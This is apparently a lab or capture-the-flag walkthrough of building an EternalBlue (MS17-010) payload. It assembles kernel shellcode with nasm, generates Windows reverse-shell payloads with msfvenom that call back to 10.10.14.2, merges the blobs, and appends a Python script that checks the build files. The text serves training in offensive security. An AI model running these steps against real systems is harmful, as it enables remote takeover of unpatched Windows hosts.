Shellcode


The exploit repo comes with a payload generation tool under the /shellcode/ directory. It contains the exploit's kernel shellcode for both the x64 and x86 architectures and a merging tool to put them all together.

To actually achieve code execution and spawn a shell, I also need a userland payload to go with that kernel shellcode.

Exploit


┌──(kali㉿kali)-[~/…/labs/blue/MS17-010/shellcode]
└─$ ls
eternalblue_kshellcode_x64.asm  eternalblue_sc_merge.py  
eternalblue_kshellcode_x86.asm  

I can see the 2 shellcode files written in assembly, one for an x64 and one for an x86 target. Those need to be assembled first.

┌──(kali㉿kali)-[~/…/labs/blue/MS17-010/shellcode]
└─$ nasm -f bin eternalblue_kshellcode_x64.asm -o sc_x64_kernel.bin
 
┌──(kali㉿kali)-[~/…/labs/blue/MS17-010/shellcode]
└─$ nasm -f bin eternalblue_kshellcode_x86.asm -o sc_x86_kernel.bin

I assemble them with nasm, using the flat binary output format. I build both since I do not know the architecture of the target system.

Reverse Shell Payload


┌──(kali㉿kali)-[~/…/labs/blue/MS17-010/shellcode]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.2 LPORT=1234 EXITFUNC=thread -f raw -o sc_x64_msf.bin 
[-] no platform was selected, choosing msf::Module::Platform::Windows from the payload
[-] no arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
payload size: 460 bytes
saved as: sc_x64_msf.bin
 
┌──(kali㉿kali)-[~/…/labs/blue/MS17-010/shellcode]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=1235 EXITFUNC=thread -f raw -o sc_x86_msf.bin   
[-] no platform was selected, choosing msf::Module::Platform::Windows from the payload
[-] no arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
payload size: 324 bytes
saved as: sc_x86_msf.bin

Now for the code execution part, I use msfvenom to generate raw reverse shell payloads for both x64 and x86, each calling back to a different port.

Merging


┌──(kali㉿kali)-[~/…/labs/blue/MS17-010/shellcode]
└─$ cat sc_x64_kernel.bin sc_x64_msf.bin > sc_x64.bin
 
┌──(kali㉿kali)-[~/…/labs/blue/MS17-010/shellcode]
└─$ cat sc_x86_kernel.bin sc_x86_msf.bin > sc_x86.bin

Each kernel shellcode needs to be concatenated with the userland payload of the same architecture, kernel shellcode first.

┌──(kali㉿kali)-[~/…/labs/blue/MS17-010/shellcode]
└─$ python eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin

Then, using the supplied merging tool, I can package the two architecture-specific blobs into a single file.
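The build above is a chain of silent steps: nothing in nasm, msfvenom or cat complains if a file is empty, was emitted in the wrong output format, or was concatenated in the wrong order, and the failure only shows up later as a crashed target or no callback. The following Python is an added sanity check, not code from the walkthrough or from the exploit repo; it reproduces the two cat steps and inspects each intermediate file. The file names are the ones used above, and the byte strings in the demo are constructed.

```python
"""Sanity-check the shellcode build artifacts before feeding them to the
merge tool (added example, not part of the walkthrough or the repo).

Checks performed:
  * each raw input is non-empty;
  * no input carries a container header: nasm with a non-'bin' format emits
    an ELF object (\\x7fELF) and msfvenom without '-f raw' emits a PE (MZ);
  * the concatenated file is exactly kernel stub followed by user payload.
"""
from pathlib import Path
from typing import List

# Magic numbers that mean "this is a linkable/executable file, not flat bytes".
BAD_MAGIC = {
    b"\x7fELF": "ELF object: nasm output format was not 'bin'",
    b"MZ": "PE executable: msfvenom -f was not 'raw'",
}


def check_raw_blob(name: str, data: bytes) -> List[str]:
    """Return a list of problems with one flat-binary input; empty means OK."""
    problems = []
    if not data:
        problems.append(f"{name}: file is empty")
    for magic, why in BAD_MAGIC.items():
        if data.startswith(magic):
            problems.append(f"{name}: starts with {magic!r}: {why}")
    return problems


def merge_blobs(kernel: bytes, payload: bytes) -> bytes:
    """Same result as `cat kernel payload > merged`: kernel stub first."""
    return kernel + payload


def check_merged(name: str, kernel: bytes, payload: bytes, merged: bytes) -> List[str]:
    """Verify that `merged` is exactly kernel + payload in that order."""
    problems = []
    if len(merged) != len(kernel) + len(payload):
        problems.append(
            f"{name}: length {len(merged)} != {len(kernel)} + {len(payload)}"
        )
    if not merged.startswith(kernel):
        problems.append(f"{name}: kernel stub is not at the start (wrong cat order?)")
    if not merged.endswith(payload):
        problems.append(f"{name}: user payload is not at the end (wrong cat order?)")
    return problems


def build_and_check(kernel_path: str, payload_path: str, out_path: str) -> List[str]:
    """Read the two raw files, write the merged file and report any problems."""
    kernel = Path(kernel_path).read_bytes()
    payload = Path(payload_path).read_bytes()
    problems = check_raw_blob(kernel_path, kernel) + check_raw_blob(payload_path, payload)
    if problems:
        return problems  # do not produce a merged file from bad inputs
    merged = merge_blobs(kernel, payload)
    Path(out_path).write_bytes(merged)
    return check_merged(out_path, kernel, payload, merged)


if __name__ == "__main__":
    # File names from the walkthrough; run this in the shellcode directory.
    for arch in ("x64", "x86"):
        issues = build_and_check(
            f"sc_{arch}_kernel.bin", f"sc_{arch}_msf.bin", f"sc_{arch}.bin"
        )
        print(f"{arch}: " + ("OK" if not issues else "; ".join(issues)))
```

Run it in place of the two cat commands; it only writes sc_x64.bin and sc_x86.bin when both inputs pass, and then the existing merge tool is invoked as before. The header check is the one that catches the most common mistake, a payload exported as an executable instead of raw bytes.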